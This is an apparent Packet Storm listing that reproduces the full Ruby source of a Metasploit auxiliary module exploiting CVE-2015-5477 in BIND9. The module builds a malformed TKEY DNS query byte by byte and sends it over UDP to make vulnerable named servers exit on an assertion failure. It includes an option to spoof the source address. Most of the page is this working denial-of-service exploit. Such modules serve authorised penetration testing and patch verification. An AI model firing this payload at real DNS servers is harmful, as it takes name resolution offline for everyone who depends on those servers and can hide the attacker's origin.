Lucene search

Wvu, throwawayokejxqbbif, Jonathan Foote, metasploit.comPACKETSTORM:180552

HistoryAug 31, 2024 - 12:00 a.m.

BIND TKEY Query Denial of Service

2024-08-3100:00:00

wvu, throwawayokejxqbbif, Jonathan Foote, metasploit.com

packetstormsecurity.com

exploit

dns server

vulnerability

bind9

tkey query

denial of service

named server

requirement assertion failure

cve-2015-5477

isc

error handling

metasploit

udp scanner

discovery

poc

source code

dos

security

module

payload

transaction key

text strings

transaction id

flags

questions

authoritative rrs

additional rrs

type

class

time to live

data length

length

source address

spoofing

references

disclosure date

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

AI Score

7.2

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Capture  
include Msf::Auxiliary::UDPScanner  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'BIND TKEY Query Denial of Service',  
'Description' => %q{  
This module sends a malformed TKEY query, which exploits an  
error in handling TKEY queries on affected BIND9 'named' DNS servers.  
As a result, a vulnerable named server will exit with a REQUIRE  
assertion failure. This condition can be exploited in versions of BIND  
between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0  
through 9.10.2-P2.  
},  
'Author' => [  
'Jonathan Foote', # Original discoverer  
'throwawayokejxqbbif', # PoC  
'wvu' # Metasploit module  
],  
'References' => [  
['CVE', '2015-5477'],  
['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],  
['URL', 'https://kb.isc.org/article/AA-01272']  
],  
'DisclosureDate' => '2015-07-28',  
'License' => MSF_LICENSE,  
'DefaultOptions' => {'ScannerRecvWindow' => 0}  
))  
  
register_options([  
Opt::RPORT(53),  
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])  
])  
  
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')  
end  
  
def scan_host(ip)  
if datastore['SRC_ADDR']  
scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])  
else  
print_status("Sending packet to #{ip}")  
scanner_send(payload, ip, rport)  
end  
end  
  
def payload  
name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)  
txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)  
  
name_length = [name.length].pack('C')  
txt_length = [txt.length].pack('C')  
data_length = [txt.length + 1].pack('n')  
ttl = [rand(2 ** 31 - 1) + 1].pack('N')  
  
query = "\x00\x00" # Transaction ID: 0x0000  
query << "\x00\x00" # Flags: 0x0000 Standard query  
query << "\x00\x01" # Questions: 1  
query << "\x00\x00" # Answer RRs: 0  
query << "\x00\x00" # Authority RRs: 0  
query << "\x00\x01" # Additional RRs: 1  
  
query << name_length # [Name Length]  
query << name # Name  
query << "\x00" # [End of name]  
query << "\x00\xf9" # Type: TKEY (Transaction Key) (249)  
query << "\x00\x01" # Class: IN (0x0001)  
  
query << name_length # [Name Length]  
query << name # Name  
query << "\x00" # [End of name]  
query << "\x00\x10" # Type: TXT (Text strings) (16)  
query << "\x00\x01" # Class: IN (0x0001)  
query << ttl # Time to live  
query << data_length # Data length  
query << txt_length # TXT Length  
query << txt # TXT  
end  
end  
`